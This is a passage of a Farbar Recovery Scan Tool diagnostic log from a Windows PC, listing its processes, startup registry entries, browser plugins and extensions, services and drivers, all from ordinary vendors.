(Enigma Software Group USA, LLC.) C:\Program Files\Enigma Software Group\SpyHunter\SpyHunter4.exe
(Wacom Technology, Corp.) C:\Program Files\Tablet\Pen\Pen_Tablet.exe
(Microsoft Corporation) C:\Windows\System32\SkyDrive.exe
(NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\Display\nvtray.exe
(NVIDIA Corporation) C:\Program Files (x86)\NVIDIA Corporation\Update Core\NvBackend.exe
(Microsoft Corporation) C:\Windows\System32\GWX\GWX.exe
(Atheros Communications) C:\Program Files (x86)\Bluetooth Suite\BtvStack.exe
() C:\Program Files (x86)\Bluetooth Suite\ActivateDesktop.exe
(Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
(MSI) C:\Program Files (x86)\SCM\Radio Manager.exe
(MSI) C:\Program Files (x86)\SCM\SCM.exe
(NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\NvStreamSrv\NvStreamUserAgent.exe
(Microsoft Corporation) C:\Windows\System32\rundll32.exe
(Logitech Inc.) C:\Program Files\Logitech Gaming Software\LCore.exe
(Synaptics Incorporated) C:\Program Files\Synaptics\SynTP\SynTPEnh.exe
(Spotify Ltd) C:\Users\Eirik\AppData\Roaming\Spotify\SpotifyWebHelper.exe
(Synaptics Incorporated) C:\Program Files\Synaptics\SynTP\SynTPHelper.exe
(Dropbox, Inc.) C:\Users\Eirik\AppData\Roaming\Dropbox\bin\Dropbox.exe
(Piriform Ltd) C:\Program Files\CCleaner\CCleaner64.exe
(Micro-Star International Co., Ltd.) C:\Program Files (x86)\MSI\KLM\KLM.exe
(Creative Technology Ltd) C:\Program Files (x86)\Creative\Sound Blaster Cinema\Sound Blaster Cinema\SBCinema.exe
(MSI) C:\Program Files (x86)\MSI\Super-Charger\Super-Charger.exe
(CyberLink Corp.) C:\Program Files (x86)\CyberLink\PowerDVD10\PDVD10Serv.exe
(BlueStack Systems, Inc.) C:\Program Files (x86)\BlueStacks\HD-Agent.exe
(AVAST Software) C:\Program Files\AVAST Software\Avast\AvastUI.exe
(Oracle Corporation) C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe
(Intel Corporation) C:\Program Files\Intel\Intel® Rapid Storage Technology\IAStorIcon.exe
(Microsoft Corporation) C:\Windows\System32\SettingSyncHost.exe
(Microsoft Corporation) C:\Windows\SysWOW64\wbem\WmiPrvSE.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Microsoft Corporation) C:\Windows\System32\rundll32.exe
 
 
==================== Registry (Whitelisted) ===========================
 
(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)
 
HKLM\...\Run: [RTHDVCPL] => C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe [13513288 2013-04-24] (Realtek Semiconductor)
HKLM\...\Run: [iAStorIcon] => C:\Program Files\Intel\Intel® Rapid Storage Technology\IAStorIcon.exe [286704 2013-03-22] (Intel Corporation)
HKLM\...\Run: [Radio Manager] => C:\Program Files (x86)\SCM\Radio Manager.exe [406920 2013-04-18] (MSI)
HKLM\...\Run: [sCM] => C:\Program Files (x86)\SCM\SCM.exe [407968 2013-04-18] (MSI)
HKLM\...\Run: [MBCfg64] => C:\Windows\system32\RunDLL32.exe C:\Windows\system32\MBCfg64.dll,RunDLLEntry MBCfg64
HKLM\...\Run: [igfxTray] => C:\Windows\system32\igfxtray.exe [455784 2014-09-05] ()
HKLM\...\Run: [AdobeAAMUpdater-1.0] => C:\Program Files (x86)\Common Files\Adobe\OOBE\PDApp\UWA\UpdaterStartupUtility.exe [446392 2012-04-04] (Adobe Systems Incorporated)
HKLM\...\Run: [shadowPlay] => "C:\WINDOWS\system32\rundll32.exe" C:\WINDOWS\system32\nvspcap64.dll,ShadowPlayOnSystemStart
HKLM\...\Run: [NvBackend] => C:\Program Files (x86)\NVIDIA Corporation\Update Core\NvBackend.exe [2787264 2016-01-12] (NVIDIA Corporation)
HKLM\...\Run: [Launch LCore] => C:\Program Files\Logitech Gaming Software\LCore.exe [15033976 2015-11-20] (Logitech Inc.)
HKLM\...\Run: [synTPEnh] => C:\Program Files\Synaptics\SynTP\SynTPEnh.exe [2773232 2015-12-01] (Synaptics Incorporated)
HKLM-x32\...\Run: [KLM] => C:\Program Files (x86)\MSI\KLM\KLM.exe [1564040 2013-04-22] (Micro-Star International Co., Ltd.)
HKLM-x32\...\Run: [sound Blaster Cinema] => C:\Program Files (x86)\Creative\Sound Blaster Cinema\Sound Blaster Cinema\SBCinema.exe [711680 2012-11-29] (Creative Technology Ltd)
HKLM-x32\...\Run: [updReg] => C:\Windows\UpdReg.EXE
HKLM-x32\...\Run: [super-Charger] => C:\Program Files (x86)\MSI\Super-Charger\Super-Charger.exe [490480 2013-02-07] (MSI)
HKLM-x32\...\Run: [RemoteControl10] => C:\Program Files (x86)\CyberLink\PowerDVD10\PDVD10Serv.exe [91432 2012-03-29] (CyberLink Corp.)
HKLM-x32\...\Run: [blueStacks Agent] => c:\Program Files (x86)\BlueStacks\HD-Agent.exe [597880 2013-01-07] (BlueStack Systems, Inc.)
HKLM-x32\...\Run: [switchBoard] => C:\Program Files (x86)\Common Files\Adobe\SwitchBoard\SwitchBoard.exe [517096 2010-02-19] (Adobe Systems Incorporated)
HKLM-x32\...\Run: [AdobeCS6ServiceManager] => C:\Program Files (x86)\Common Files\Adobe\CS6ServiceManager\CS6ServiceManager.exe [1073312 2012-03-09] (Adobe Systems Incorporated)
HKLM-x32\...\Run: [amd_dc_opt] => C:\Program Files (x86)\AMD\Dual-Core Optimizer\amd_dc_opt.exe [77824 2008-07-22] (AMD)
HKLM-x32\...\Run: [LogMeIn Hamachi Ui] => C:\Program Files (x86)\LogMeIn Hamachi\hamachi-2-ui.exe [5565448 2015-11-12] (LogMeIn Inc.)
HKLM-x32\...\Run: [AvastUI.exe] => C:\Program Files\AVAST Software\Avast\AvastUI.exe [7021880 2016-01-20] (AVAST Software)
HKLM-x32\...\Run: [sunJavaUpdateSched] => C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe [595504 2016-01-29] (Oracle Corporation)
HKLM\...\Policies\Explorer\Run: [btvStack] => C:\Program Files (x86)\Bluetooth Suite\BtvStack.exe [132736 2013-02-26] (Atheros Communications)
HKU\S-1-5-21-730552332-2537374774-3045828507-1002\...\Run: [Dropbox Update] => C:\Users\Eirik\AppData\Local\Dropbox\Update\DropboxUpdate.exe [134512 2015-06-18] (Dropbox, Inc.)
HKU\S-1-5-21-730552332-2537374774-3045828507-1002\...\Run: [spotify Web Helper] => C:\Users\Eirik\AppData\Roaming\Spotify\SpotifyWebHelper.exe [1524336 2016-02-26] (Spotify Ltd)
HKU\S-1-5-21-730552332-2537374774-3045828507-1002\...\Run: [CCleaner Monitoring] => C:\Program Files\CCleaner\CCleaner64.exe [8590760 2015-12-08] (Piriform Ltd)
HKU\S-1-5-21-730552332-2537374774-3045828507-1002-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-0\...\Run: [Dropbox Update] => C:\Users\Eirik\AppData\Local\Dropbox\Update\DropboxUpdate.exe [134512 2015-06-18] (Dropbox, Inc.)
HKU\S-1-5-21-730552332-2537374774-3045828507-1002-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-0\...\Run: [spotify Web Helper] => C:\Users\Eirik\AppData\Roaming\Spotify\SpotifyWebHelper.exe [1524336 2016-02-26] (Spotify Ltd)
HKU\S-1-5-21-730552332-2537374774-3045828507-1002-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-0\...\Run: [CCleaner Monitoring] => C:\Program Files\CCleaner\CCleaner64.exe [8590760 2015-12-08] (Piriform Ltd)
AppInit_DLLs: C:\Windows\system32\nvinitx.dll => C:\Windows\system32\nvinitx.dll [175368 2016-01-23] (NVIDIA Corporation)
AppInit_DLLs: , C:\WINDOWS\system32\nvinitx.dll => C:\WINDOWS\system32\nvinitx.dll [175368 2016-01-23] (NVIDIA Corporation)
AppInit_DLLs-x32: C:\WINDOWS\SysWOW64\nvinit.dll => C:\WINDOWS\SysWOW64\nvinit.dll [153392 2016-01-23] (NVIDIA Corporation)
ShellIconOverlayIdentifiers: [00avast] -> {472083B0-C522-11CF-8763-00608CC02F24} => C:\Program Files\AVAST Software\Avast\ashShA64.dll [2016-01-20] (AVAST Software)
ShellIconOverlayIdentifiers: [DropboxExt1] -> {FB314ED9-A251-47B7-93E1-CDD82E34AF8B} => C:\Users\Eirik\AppData\Roaming\Dropbox\bin\DropboxExt64.33.dll [2016-02-16] (Dropbox, Inc.)
ShellIconOverlayIdentifiers: [DropboxExt2] -> {FB314EDA-A251-47B7-93E1-CDD82E34AF8B} => C:\Users\Eirik\AppData\Roaming\Dropbox\bin\DropboxExt64.33.dll [2016-02-16] (Dropbox, Inc.)
ShellIconOverlayIdentifiers: [DropboxExt3] -> {FB314EDB-A251-47B7-93E1-CDD82E34AF8B} => C:\Users\Eirik\AppData\Roaming\Dropbox\bin\DropboxExt64.33.dll [2016-02-16] (Dropbox, Inc.)
ShellIconOverlayIdentifiers: [DropboxExt4] -> {FB314EDC-A251-47B7-93E1-CDD82E34AF8B} => C:\Users\Eirik\AppData\Roaming\Dropbox\bin\DropboxExt64.33.dll [2016-02-16] (Dropbox, Inc.)
ShellIconOverlayIdentifiers-x32: [ SkyDrivePro1 (ErrorConflict)] -> {8BA85C75-763B-4103-94EB-9470F12FE0F7} => C:\Program Files\Microsoft Office 15\root\Office15\GROOVEEX.DLL [2016-02-23] (Microsoft Corporation)
ShellIconOverlayIdentifiers-x32: [ SkyDrivePro2 (SyncInProgress)] -> {CD55129A-B1A1-438E-A425-CEBC7DC684EE} => C:\Program Files\Microsoft Office 15\root\Office15\GROOVEEX.DLL [2016-02-23] (Microsoft Corporation)
ShellIconOverlayIdentifiers-x32: [ SkyDrivePro3 (InSync)] -> {E768CD3B-BDDC-436D-9C13-E1B39CA257B1} => C:\Program Files\Microsoft Office 15\root\Office15\GROOVEEX.DLL [2016-02-23] (Microsoft Corporation)
ShellIconOverlayIdentifiers-x32: [DropboxExt1] -> {FB314ED9-A251-47B7-93E1-CDD82E34AF8B} => C:\Users\Eirik\AppData\Roaming\Dropbox\bin\DropboxExt.33.dll [2016-02-16] (Dropbox, Inc.)
ShellIconOverlayIdentifiers-x32: [DropboxExt2] -> {FB314EDA-A251-47B7-93E1-CDD82E34AF8B} => C:\Users\Eirik\AppData\Roaming\Dropbox\bin\DropboxExt.33.dll [2016-02-16] (Dropbox, Inc.)
ShellIconOverlayIdentifiers-x32: [DropboxExt3] -> {FB314EDB-A251-47B7-93E1-CDD82E34AF8B} => C:\Users\Eirik\AppData\Roaming\Dropbox\bin\DropboxExt.33.dll [2016-02-16] (Dropbox, Inc.)
Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\Qualcomm Atheros Killer Network Manager.lnk [2013-04-24]
ShortcutTarget: Qualcomm Atheros Killer Network Manager.lnk -> C:\Program Files\Qualcomm Atheros\Killer Network Manager\KillerNetManager.exe ()
Startup: C:\Users\Eirik\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Dropbox.lnk [2016-02-18]
ShortcutTarget: Dropbox.lnk -> C:\Users\Eirik\AppData\Roaming\Dropbox\bin\Dropbox.exe (Dropbox, Inc.)
 
==================== Internet (Whitelisted) ====================
 
(If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)
 
Tcpip\..\Interfaces\{9DBBD578-1F2D-49B3-AF19-9BA3EA7169DF}: [DhcpNameServer] 193.213.112.4 130.67.15.198
 
Internet Explorer:
==================
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Start Page = hxxp://www.msn.com/?pc=AV01
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Page_URL = 
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Search_URL = 
HKU\S-1-5-21-730552332-2537374774-3045828507-1002\Software\Microsoft\Internet Explorer\Main,Search Page = hxxp://www.bing.com/search?q={searchTerms}&FORM=AVASDF&PC=AV01
HKU\S-1-5-21-730552332-2537374774-3045828507-1002\Software\Microsoft\Internet Explorer\Main,Search Bar = hxxp://www.msn.com/?pc=AV01
HKU\S-1-5-21-730552332-2537374774-3045828507-1002-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-0\Software\Microsoft\Internet Explorer\Main,Search Page = hxxp://www.bing.com/search?q={searchTerms}&FORM=AVASDF&PC=AV01
HKU\S-1-5-21-730552332-2537374774-3045828507-1002-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-0\Software\Microsoft\Internet Explorer\Main,Search Bar = hxxp://www.msn.com/?pc=AV01
SearchScopes: HKLM -> DefaultScope {C20F2EF6-44CE-4E46-8912-DE1A7605CD4B} URL = 
SearchScopes: HKLM-x32 -> DefaultScope {632F07F3-19A1-4d16-A23F-E6CE9486BAB5} URL = hxxp://www.bing.com/search?q={searchTerms}&FORM=AVASDF&PC=AV01
SearchScopes: HKLM-x32 -> {632F07F3-19A1-4d16-A23F-E6CE9486BAB5} URL = hxxp://www.bing.com/search?q={searchTerms}&FORM=AVASDF&PC=AV01
SearchScopes: HKU\S-1-5-21-730552332-2537374774-3045828507-1002 -> {632F07F3-19A1-4d16-A23F-E6CE9486BAB5} URL = hxxp://www.bing.com/search?q={searchTerms}&FORM=AVASDF&PC=AV01
SearchScopes: HKU\S-1-5-21-730552332-2537374774-3045828507-1002-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-0 -> {632F07F3-19A1-4d16-A23F-E6CE9486BAB5} URL = hxxp://www.bing.com/search?q={searchTerms}&FORM=AVASDF&PC=AV01
BHO: Skype for Business Browser Helper -> {31D09BA0-12F5-4CCE-BE8A-2923E76605DA} -> C:\Program Files\Microsoft Office 15\root\VFS\ProgramFilesX64\Microsoft Office\Office15\OCHelper.dll [2016-02-23] (Microsoft Corporation)
BHO: avast! Online Security -> {8E5E2654-AD2D-48bf-AC2D-D17F00898D06} -> C:\Program Files\AVAST Software\Avast\aswWebRepIE64.dll [2016-01-20] (AVAST Software)
BHO: Microsoft SkyDrive Pro Browser Helper -> {D0498E0A-45B7-42AE-A9AA-ABA463DBD3BF} -> C:\Program Files\Microsoft Office 15\root\VFS\ProgramFilesX64\Microsoft Office\Office15\GROOVEEX.DLL [2016-02-23] (Microsoft Corporation)
BHO-x32: Skype for Business Browser Helper -> {31D09BA0-12F5-4CCE-BE8A-2923E76605DA} -> C:\Program Files\Microsoft Office 15\root\Office15\OCHelper.dll [2016-02-23] (Microsoft Corporation)
BHO-x32: Java Plug-In SSV Helper -> {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} -> C:\Program Files (x86)\Java\jre1.8.0_74\bin\ssv.dll [2016-02-13] (Oracle Corporation)
BHO-x32: avast! Online Security -> {8E5E2654-AD2D-48bf-AC2D-D17F00898D06} -> C:\Program Files\AVAST Software\Avast\aswWebRepIE.dll [2016-01-20] (AVAST Software)
BHO-x32: Microsoft SkyDrive Pro Browser Helper -> {D0498E0A-45B7-42AE-A9AA-ABA463DBD3BF} -> C:\Program Files\Microsoft Office 15\root\Office15\GROOVEEX.DLL [2016-02-23] (Microsoft Corporation)
BHO-x32: Java Plug-In 2 SSV Helper -> {DBC80044-A445-435b-BC74-9C25C1C588A9} -> C:\Program Files (x86)\Java\jre1.8.0_74\bin\jp2ssv.dll [2016-02-13] (Oracle Corporation)
Handler-x32: osf - {D924BDC6-C83A-4BD5-90D0-095128A113D1} - C:\Program Files\Microsoft Office 15\root\Office15\MSOSB.DLL [2016-02-23] (Microsoft Corporation)
Handler-x32: skype4com - {FFC8B962-9B40-4DFF-9458-1830C7DD7F5D} - C:\Program Files (x86)\Common Files\Skype\Skype4COM.dll [2014-05-02] (Skype Technologies)
 
FireFox:
========
FF ProfilePath: C:\Users\Eirik\AppData\Roaming\Mozilla\Firefox\Profiles\x56ct6fm.Standardbruker
FF Plugin: @adobe.com/FlashPlayer -> C:\WINDOWS\system32\Macromed\Flash\NPSWF64_20_0_0_306.dll [2016-02-10] ()
FF Plugin: @wacom.com/wtPlugin,version=2.1.0.2 -> C:\Program Files\TabletPlugins\npWacomTabletPlugin.dll [2012-05-23] (Wacom)
FF Plugin-x32: @adobe.com/FlashPlayer -> C:\WINDOWS\SysWOW64\Macromed\Flash\NPSWF32_20_0_0_306.dll [2016-02-10] ()
FF Plugin-x32: @intel-webapi.intel.com/Intel WebAPI ipt;version=3.0.72 -> C:\Program Files (x86)\Intel\Intel® Management Engine Components\IPT\npIntelWebAPIIPT.dll [2013-03-12] (Intel Corporation)
FF Plugin-x32: @intel-webapi.intel.com/Intel WebAPI updater -> C:\Program Files (x86)\Intel\Intel® Management Engine Components\IPT\npIntelWebAPIUpdater.dll [2013-03-12] (Intel Corporation)
FF Plugin-x32: @java.com/DTPlugin,version=11.74.2 -> C:\Program Files (x86)\Java\jre1.8.0_74\bin\dtplugin\npDeployJava1.dll [2016-02-13] (Oracle Corporation)
FF Plugin-x32: @java.com/JavaPlugin,version=11.74.2 -> C:\Program Files (x86)\Java\jre1.8.0_74\bin\plugin2\npjp2.dll [2016-02-13] (Oracle Corporation)
FF Plugin-x32: @microsoft.com/Lync,version=15.0 -> C:\Program Files\Microsoft Office 15\root\VFS\ProgramFilesX86\Mozilla Firefox\plugins\npmeetingjoinpluginoc.dll [2016-02-23] (Microsoft Corporation)
FF Plugin-x32: @microsoft.com/SharePoint,version=14.0 -> C:\Program Files\Microsoft Office 15\root\Office15\NPSPWRAP.DLL [2016-02-23] (Microsoft Corporation)
FF Plugin-x32: @microsoft.com/WLPG,version=16.4.3505.0912 -> C:\Program Files (x86)\Windows Live\Photo Gallery\NPWLPG.dll [2012-09-13] (Microsoft Corporation)
FF Plugin-x32: @nvidia.com/3DVision -> C:\Program Files (x86)\NVIDIA Corporation\3D Vision\npnv3dv.dll [2016-01-23] (NVIDIA Corporation)
FF Plugin-x32: @nvidia.com/3DVisionStreaming -> C:\Program Files (x86)\NVIDIA Corporation\3D Vision\npnv3dvstreaming.dll [2016-01-23] (NVIDIA Corporation)
FF Plugin-x32: @tools.google.com/Google Update;version=3 -> C:\Program Files (x86)\Google\Update\1.3.29.5\npGoogleUpdate3.dll [2016-02-21] (Google Inc.)
FF Plugin-x32: @tools.google.com/Google Update;version=9 -> C:\Program Files (x86)\Google\Update\1.3.29.5\npGoogleUpdate3.dll [2016-02-21] (Google Inc.)
FF Plugin-x32: @videolan.org/vlc,version=2.1.0 -> C:\Program Files (x86)\VideoLAN\VLC\npvlc.dll [2016-01-21] (VideoLAN)
FF Plugin-x32: @wacom.com/wtPlugin,version=2.1.0.2 -> C:\Program Files (x86)\TabletPlugins\npWacomTabletPlugin.dll [2012-05-23] (Wacom)
FF Plugin-x32: Adobe Reader -> C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AIR\nppdf32.dll [2015-12-18] (Adobe Systems Inc.)
FF Plugin HKU\S-1-5-21-730552332-2537374774-3045828507-1002: @unity3d.com/UnityPlayer,version=1.0 -> C:\Users\Eirik\AppData\LocalLow\Unity\WebPlayer\loader\npUnity3D32.dll [2014-01-23] (Unity Technologies ApS)
FF Plugin HKU\S-1-5-21-730552332-2537374774-3045828507-1002: wacom.com/WacomTabletPlugin -> C:\Program Files\TabletPlugins\npWacomTabletPlugin.dll [2012-05-23] (Wacom)
FF Plugin HKU\S-1-5-21-730552332-2537374774-3045828507-1002-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-0: @unity3d.com/UnityPlayer,version=1.0 -> C:\Users\Eirik\AppData\LocalLow\Unity\WebPlayer\loader\npUnity3D32.dll [2014-01-23] (Unity Technologies ApS)
FF Plugin HKU\S-1-5-21-730552332-2537374774-3045828507-1002-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-0: wacom.com/WacomTabletPlugin -> C:\Program Files\TabletPlugins\npWacomTabletPlugin.dll [2012-05-23] (Wacom)
FF HKLM-x32\...\Firefox\Extensions: [wrc@avast.com] - C:\Program Files\AVAST Software\Avast\WebRep\FF
FF Extension: Avast Online Security - C:\Program Files\AVAST Software\Avast\WebRep\FF [2016-01-22]
FF HKLM-x32\...\Firefox\Extensions: [sp@avast.com] - C:\Program Files\AVAST Software\Avast\SafePrice\FF
FF Extension: Avast SafePrice - C:\Program Files\AVAST Software\Avast\SafePrice\FF [2016-01-22]
 
Chrome: 
=======
CHR Profile: C:\Users\Eirik\AppData\Local\Google\Chrome\User Data\Default
CHR Extension: (Google Docs) - C:\Users\Eirik\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake [2015-02-05]
CHR Extension: (Google Drive) - C:\Users\Eirik\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf [2015-10-25]
CHR Extension: (YouTube) - C:\Users\Eirik\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2015-10-20]
CHR Extension: (Google Search) - C:\Users\Eirik\AppData\Local\Google\Chrome\User Data\Default\Extensions\coobgpohoikkiipiblmjeljniedjpjpf [2015-11-04]
CHR Extension: (Google Sheets) - C:\Users\Eirik\AppData\Local\Google\Chrome\User Data\Default\Extensions\felcaaldnbdncclmgdcncolpebgiejap [2016-02-22]
CHR Extension: (Google Docs Offline) - C:\Users\Eirik\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi [2015-11-23]
CHR Extension: (Chrome Nettmarked-betalinger) - C:\Users\Eirik\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2015-07-25]
CHR Extension: (Gmail) - C:\Users\Eirik\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2015-03-29]
CHR HKLM-x32\...\Chrome\Extension: [gomekmidlodglbbmalcneegieacbdmki] - C:\Program Files\AVAST Software\Avast\WebRep\Chrome\aswWebRepChrome.crx [2016-01-20]
 
==================== Services (Whitelisted) ========================
 
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
 
R2 AtherosSvc; C:\Program Files (x86)\Bluetooth Suite\adminservice.exe [227968 2013-02-26] (Qualcomm Atheros Commnucations) [File not signed]
R2 avast! Antivirus; C:\Program Files\AVAST Software\Avast\AvastSvc.exe [226440 2016-01-20] (AVAST Software)
S2 BstHdAndroidSvc; c:\Program Files (x86)\BlueStacks\HD-Service.exe [393080 2013-01-07] (BlueStack Systems, Inc.)
R2 BstHdLogRotatorSvc; c:\Program Files (x86)\BlueStacks\HD-LogRotatorService.exe [384888 2013-01-07] (BlueStack Systems, Inc.)
R2 ClickToRunSvc; C:\Program Files\Microsoft Office 15\ClientX64\OfficeClickToRun.exe [2809072 2016-01-20] (Microsoft Corporation)
R2 GfExperienceService; C:\Program Files\NVIDIA Corporation\GeForce Experience Service\GfExperienceService.exe [1163200 2016-01-12] (NVIDIA Corporation)
R2 IAStorDataMgrSvc; C:\Program Files\Intel\Intel® Rapid Storage Technology\IAStorDataMgrSvc.exe [15344 2013-03-22] (Intel Corporation)
R2 igfxCUIService1.0.0.0; C:\Windows\system32\igfxCUIService.exe [326760 2014-09-05] (Intel Corporation)
R2 Intel® Capability Licensing Service Interface; C:\Program Files\Intel\iCLS Client\HeciServer.exe [731648 2013-02-13] (Intel® Corporation) [File not signed]
S3 Intel® Capability Licensing Service TCP IP Interface; C:\Program Files\Intel\iCLS Client\SocketHeciServer.exe [820184 2013-02-13] (Intel® Corporation)
R2 Intel® ME Service; C:\Program Files (x86)\Intel\Intel® Management Engine Components\FWService\IntelMeFWService.exe [131544 2013-03-12] (Intel Corporation)
S3 iumsvc; C:\Program Files (x86)\Intel\Intel® Update Manager\bin\iumsvc.exe [178312 2015-09-25] (Intel Corporation)
R2 jhi_service; C:\Program Files (x86)\Intel\Intel® Management Engine Components\DAL\jhi_service.exe [169432 2013-03-12] (Intel Corporation)
R2 LMIGuardianSvc; C:\Program Files (x86)\LogMeIn Hamachi\LMIGuardianSvc.exe [417552 2015-11-12] (LogMeIn, Inc.)
R2 LogiRegistryService; C:\Program Files\Logitech Gaming Software\Drivers\APOService\LogiRegistryService.exe [193144 2015-11-20] (Logitech Inc.)
R2 MBAMScheduler; C:\Program Files (x86)\Malwarebytes Anti-Malware\mbamscheduler.exe [1513784 2015-10-05] (Malwarebytes)
R2 MBAMService; C:\Program Files (x86)\Malwarebytes Anti-Malware\mbamservice.exe [1135416 2015-10-05] (Malwarebytes)
R2 Micro Star SCM; C:\Program Files (x86)\SCM\MSIService.exe [160768 2013-04-18] (Micro-Star International Co., Ltd.) [File not signed]
R2 MSI_SuperCharger; C:\Program Files (x86)\MSI\Super-Charger\ChargeService.exe [154112 2013-02-08] (MSI) [File not signed]
S3 npggsvc; C:\WINDOWS\SysWOW64\GameMon.des [3611808 2015-07-22] (INCA Internet Co., Ltd.)
R2 NvNetworkService; C:\Program Files (x86)\NVIDIA Corporation\NetService\NvNetworkService.exe [1879488 2016-01-12] (NVIDIA Corporation)
R3 NvStreamNetworkSvc; C:\Program Files\NVIDIA Corporation\NvStreamSrv\NvStreamNetworkService.exe [6308288 2016-01-12] (NVIDIA Corporation)
R2 NvStreamSvc; C:\Program Files\NVIDIA Corporation\NvStreamSrv\NvStreamService.exe [4812736 2016-01-12] (NVIDIA Corporation)
R2 Qualcomm Atheros Killer Service; C:\Program Files\Qualcomm Atheros\Killer Network Manager\BFNService.exe [495616 2013-03-15] () [File not signed]
S2 SpyHunter 4 Service; C:\Program Files\Enigma Software Group\SpyHunter\SH4Service.exe [1042304 2016-02-21] (Enigma Software Group USA, LLC.)
S3 SwitchBoard; C:\Program Files (x86)\Common Files\Adobe\SwitchBoard\SwitchBoard.exe [517096 2010-02-19] (Adobe Systems Incorporated) [File not signed]
S3 WdNisSvc; C:\Program Files\Windows Defender\NisSrv.exe [366552 2015-07-07] (Microsoft Corporation)
S2 WinDefend; C:\Program Files\Windows Defender\MsMpEng.exe [23824 2015-07-07] (Microsoft Corporation)
R2 WTabletServiceCon; C:\Program Files\Tablet\Pen\WTabletServiceCon.exe [619904 2012-12-11] (Wacom Technology, Corp.)
R2 ZAtheros Bt and Wlan Coex Agent; C:\Program Files (x86)\Bluetooth Suite\Ath_CoexAgent.exe [323584 2013-02-25] (Atheros) [File not signed]
 
===================== Drivers (Whitelisted) ==========================
 
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
 
R3 akw8x64; C:\Windows\system32\DRIVERS\akw8x64.sys [3758800 2013-03-15] (Qualcomm Atheros, Inc.)
R2 aswHwid; C:\Windows\system32\drivers\aswHwid.sys [28656 2016-01-20] (AVAST Software)
R2 aswMonFlt; C:\Windows\system32\drivers\aswMonFlt.sys [97648 2016-01-20] (AVAST Software)
R1 aswRdr; C:\Windows\system32\drivers\aswRdr2.sys [93528 2016-01-20] (AVAST Software)
R0 aswRvrt; C:\Windows\System32\Drivers\aswRvrt.sys [65224 2016-01-20] (AVAST Software)
R1 aswSnx; C:\Windows\system32\drivers\aswSnx.sys [1065208 2016-01-20] (AVAST Software)
R1 aswSP; C:\Windows\system32\drivers\aswSP.sys [464256 2016-01-20] (AVAST Software)
R2 aswStm; C:\Windows\system32\drivers\aswStm.sys [155304 2016-01-20] (AVAST Software)
R0 aswVmm; C:\Windows\System32\Drivers\aswVmm.sys [273784 2016-01-20] (AVAST Software)
S1 BfLwf; C:\Windows\system32\DRIVERS\bwcW8x64.sys [74096 2013-03-15] (Qualcomm Atheros, Inc.)
S2 BstHdDrv; c:\Program Files (x86)\BlueStacks\HD-Hypervisor-amd64.sys [71032 2013-01-07] (BlueStack Systems)
S3 BTATH_LWFLT; C:\Windows\system32\DRIVERS\btath_lwflt.sys [77464 2013-02-26] (Qualcomm Atheros)
S3 dot4; C:\Windows\system32\DRIVERS\Dot4.sys [151968 2012-10-19] (Windows ® Win 7 DDK provider)
S3 Dot4Print; C:\Windows\System32\drivers\Dot4Prt.sys [27040 2012-10-19] (Windows ® Win 7 DDK provider)
S0 ebdrv; C:\Windows\System32\drivers\evbda.sys [3357024 2013-08-22] (Broadcom Corporation)
R3 esgiguard; C:\Program Files\Enigma Software Group\SpyHunter\esgiguard.sys [15920 2016-02-21] (Enigma Software Group USA, LLC.)
S3 EsgScanner; C:\Windows\System32\DRIVERS\EsgScanner.sys [22704 2016-02-21] ()
R3 Hamachi; C:\Windows\system32\DRIVERS\Hamdrv.sys [45680 2015-11-12] (LogMeIn Inc.)
R3 Ke2200; C:\Windows\system32\DRIVERS\e22w8x64.sys [174448 2013-03-15] (Qualcomm Atheros, Inc.)
S3 LADF_BakerCOnly; C:\Windows\system32\DRIVERS\ladfBakerCamd64.sys [363096 2010-07-08] (Logitech)
S3 LADF_BakerROnly; C:\Windows\system32\DRIVERS\ladfBakerRamd64.sys [334552 2010-07-08] (Logitech)
R2 LGCoreTemp; C:\Program Files\Logitech Gaming Software\Drivers\LgCoreTemp\lgcoretemp.sys [14184 2015-06-21] (Logitech)
R3 LGJoyXlCore; C:\Windows\system32\drivers\LGJoyXlCore.sys [68384 2015-06-11] (Logitech Inc.)
R3 lgLowAudio; C:\Windows\system32\drivers\lgLowAudio.sys [26264 2015-11-20] (Logitech Inc.)
S3 LGSHidFilt; C:\Windows\system32\DRIVERS\LGSHidFilt.Sys [64280 2013-05-30] (Logitech Inc.)
